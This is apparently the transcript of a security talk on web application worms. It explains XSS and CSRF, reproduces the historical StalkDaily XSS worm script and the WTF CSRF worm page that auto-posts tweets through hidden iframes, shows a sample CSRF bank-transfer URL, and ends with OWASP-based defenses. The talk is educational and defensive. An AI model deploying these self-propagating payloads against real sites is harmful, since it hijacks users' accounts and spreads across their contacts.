web application worms
DESCRIPTION
Web application vulnerabilities are dangerous. Hackers can target the web application directly (e.g. via SQL Injection) or can target the web application users (e.g. via XSS). In recent years a new type of attacks was developed in which an infected innocent user is infecting other users (AKA Web Application Worms). Such attacks usually has an exponential growth and a massive damage. This presentation we will discuss how to develop a web application worm and most importantly how to protect your website from web application worms.TRANSCRIPT
@mostafasiraj
Web Application WormsBy: Mostafa Siraj
@mostafasiraj
Agenda• Computer Worms• Why Hackers Develop Web Application Worms• Web Application Worms• Introduction to XSS• StalkDaily Worm on Twitter - XSS Worm • Introduction to CSRF• WTF Worm on Twitter – CSRF Worm• Potential Business Impact • XSS & CSRF Defenses for• Users• Web Developers• Security Professionals
• Questions
@mostafasiraj
DISCLAIMER
– Hacking websites is ILLEGAL– This presentation is meant for educational purposes ONLY– Only use this stuff on YOUR website and YOUR account
@mostafasiraj
Computer Worm
A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it.
(1) According to Wikipedia
@mostafasiraj
Why Hackers Develop Web Application Worms
• Easier to develop• Cross platform (Windows, Linux, OSX and Android) since execution occurs in web browser• Don’t rely on browser, application or OS vulnerabilities• Can propagate faster and cleaner than even the most notorious worms• 1.01 billion active users on FB (2) according to yahoo finance
• 170 million active users on Twitter (3) according to techcrunch
@mostafasiraj
Percentage likelihood that at least one serious vulnerability will appear in a website
(4) According to whitehat security website statistics report, Summer 2012
@mostafasiraj
Internet
Web Application Worms
An XSS worm is a malicious (or sometimes non-malicious) payload, usually written in JavaScript, that propagate among visitors of a website in the attempt to progressively infect other visitors.
(5) According to Wikipedia with modification
You’ll see how to create a worm using a CSRF vulnerability only without XSS
@mostafasiraj
How XSS Starts
Website
Adidas
@mostafasiraj
Cross Site Scripting (Reflected)
Vulnerable Site
Hacker Site
Cookie
User clicks the URLexample.com?q=<script>…….
@mostafasiraj
Cross Site Scripting (Stored XSS)
Vulnerable Site
Hacker Site
Cookie
Request a public page
@mostafasiraj
XSS Worms
StalkDaily Worm on Twitter
@mostafasiraj
The bio field allowed Javascript
<script src="hxxp://mikeyylolz.uuuq.com/x.js>“ />
StalkDaily Worm
@mostafasiraj
StalkDaily Script(6) source from dcortesi.com
update = urlencode("Hey everyone, join www.StalkDaily.com. It's a site like Twitter but with pictures, videos, and so much more! :)");
xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
var ajaxConn = new XHConn();ajaxConn.connect("/status/update", "POST",
"authenticity_token="+authtoken+"&status="+update+"&tab=home&update=update");
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update")
@mostafasiraj
StalkDaily Infected Users
@mostafasiraj
What About CSRF Worms
@mostafasiraj
CSRF ExampleUser has to be logged in
Click Here to Win
https://www.MyBank.com/Transfer?from=user&to=hacker&amount=9999
MyBank.com
@mostafasiraj
CSRF Worms
WTF Worm on Twitter
@mostafasiraj
Updating Status on Twitter wasn’t protected from CSFR
By visiting the hacker site, your twitter account will automatically write two tweets
WTF Worm
@mostafasiraj
WTF Worm Script(7) script source http://christianheilmann.com
<html> <head></head> <body> <script> var el1 = document.createElement('iframe');var el2 = document.createElement('iframe');el1.style.visibility="hidden";el2.style.visibility="hidden";el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with
%20goats"; document.getElementsByTagName("body")[0].appendChild(el1);document.getElementsByTagName("body")[0].appendChild(el2); </script> </body> </html>
@mostafasiraj
Discussion about WTF worm on Twitter
@mostafasiraj
XSS and CSRF on FacebookSearches was done on Google
@mostafasiraj
Potential Business Impact of Web Application Worms
• The snowball effect (Samy versus Code Red)• Web browser botnets (DDoS)• Think about a worm targeting eBay or Amazon (purchases,reviews,..etc) • Stealing users’ credentials (MySpace worm on 2006) (10) According to computerworld.com
• What could happen if AdSense or Facebook Connect was compromised with a web application worm• “High Roller” malware targeting cloud based banking (estimated losses 75M-2.5B) (11) According to redmondmag.com
@mostafasirajXSS & CSRF Defenses
@mostafasiraj
Defenses for Users
• Exercise caution when clicking on links sent by email, instant message or through social networks
• Use ScriptNo on Chrome and NoScript on Firefox ( Use IE at your own risk )
• Avoid questionable websites and cracked softwares
• Be alerted by security incidents
@mostafasiraj
XSS– Input Validation -accept only known good- – Output Encoding (ESAPI)– Set the session cookie to be “HTTPOnly”– Specify the output encoding ( UTF-8, ASCII, …etc)– Do not use "blacklist" validation– Don’t encode/decode more than once – (8) XSS Prevention Cheat Sheet on OWASP
CSRF– Use CSRFGuard from OWASP– Do not use the GET method for any request that triggers a state change. – Identify especially dangerous operations and send a separate confirmation
request to ensure that the user intended to perform that operation. – Ensure that there are no XSS vulnerabilities in your application– (9) CSRF Prevention Cheat Sheet on OWASP
Defenses for Web Developers
@mostafasiraj
Security Professionals
• Remember “The natural way of writing code is insecure”
• Developers must take application security training• Secure the whole SDLC• Assessments and Penetration Tests• White box and black box testing• Start considering WAF
@mostafasiraj
Questions
@mostafasiraj
References(1) Computer Worm on Wikipedia. http://en.wikipedia.org/wiki/Computer_worm(2) Active Users on Facebook. http://finance.yahoo.com/news/number-active-users-facebook-over-years-214600186--finance.html(3) Active Users on Twitter
http://techcrunch.com/2012/07/31/twitter-may-have-500m-users-but-only-170m-are-active-75-on-twitters-own-clients/(4) whitehat security website statistics report, https://www.whitehatsec.com/assets/WPstats_summer12_12th.pdf(5) XSS Worms on Wikipedia, http://en.wikipedia.org/wiki/XSS_worm(6) StalkDaily script, http://www.dcortesi.com/blog/2009/04/11/twitter-stalkdaily-worm-postmortem/(7) WTF script, http://christianheilmann.com(8) XSS Prevention Cheat Sheet, https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet(9) CSRF Prevention Cheat Sheet, https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet(10) MySpace worm, http://www.computerworld.com/s/article/9005607/MySpace_worm_uses_QuickTime_for_exploit(11) High Roller malware, http://redmondmag.com/articles/2012/06/20/malware-targeting-banking.aspx